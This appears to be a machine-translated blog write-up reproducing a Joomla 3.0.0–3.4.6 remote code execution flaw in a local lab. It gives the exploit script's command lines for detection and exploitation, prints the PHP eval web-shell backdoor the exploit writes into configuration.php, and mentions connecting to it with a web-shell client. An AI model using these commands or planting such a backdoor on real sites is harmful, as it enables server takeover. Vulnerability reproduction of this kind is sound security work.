Joomla 3.4.6 remote code execution vulnerability analysis reproducibility

0x00 CMS Introduction

Joomla! Is a world-renowned content management systems. Joomla! Is using PHP language plus the MySQL database software system developed, the latest version is 3.9.11. It can be performed on a variety of different platforms Linux, Windows, MacOSX and so on. Currently carried out by the Open Source Matter the open source development and support organization, the members of this organization from all over the world, members of the group of about 150 people, including developers, designers, system administrators, document writers, and more than 2 the participation of ten thousand members.
Since 2012, the awards ceremony began, Joomla CMS awards many years to become a champion. Following the 2015, 2016, 2017, 2018 CMS in the global evaluation, it won the "Best Open Source CMS" award again!

0x01 vulnerability Profile

• Alessandro Groppo @Hacktive Security released on 2019-10-02 EXP Joomla commands executed in exploit-db (https://www.exploit-db.com/exploits/47465), is essentially a loophole for Joomla session data mishandling, unauthorized attacker can send a malicious crafted HTTP request to obtain permission server, remote command execution.
• Effects range: 3.0.0 <= Joomla <= 3.4.6

0x02 environment to build

I use phpstudy build
Joomla Download: https: //downloads.joomla.org/it/cms/joomla3/3-4-6
After a successful installation the following Home

0x03 reproducible vulnerability

EXP: HTTPS: //github.com/kiks7/rusty_joomla_rce
1. Vulnerability Detection

python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -c

Results are as follows, there are loopholes Vulnerable proof

2. Exploit

rusty_joomla_rce-master>python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -e -l quan.joomla346.net -p 80

Configuration.php can be seen in the written word Trojans (here I run more than a few times, so there are several)

if(isset($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg'])) eval($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg']);if(isset($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm'])) eval($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm']);if(isset($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj'])) eval($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj']);

Connection with a kitchen knife

0x04 bug fixes

Update to the latest version of the official website

0x05 Reference

https://mp.weixin.qq.com/s/1LJJG-whv1vUfaWDSfA2gg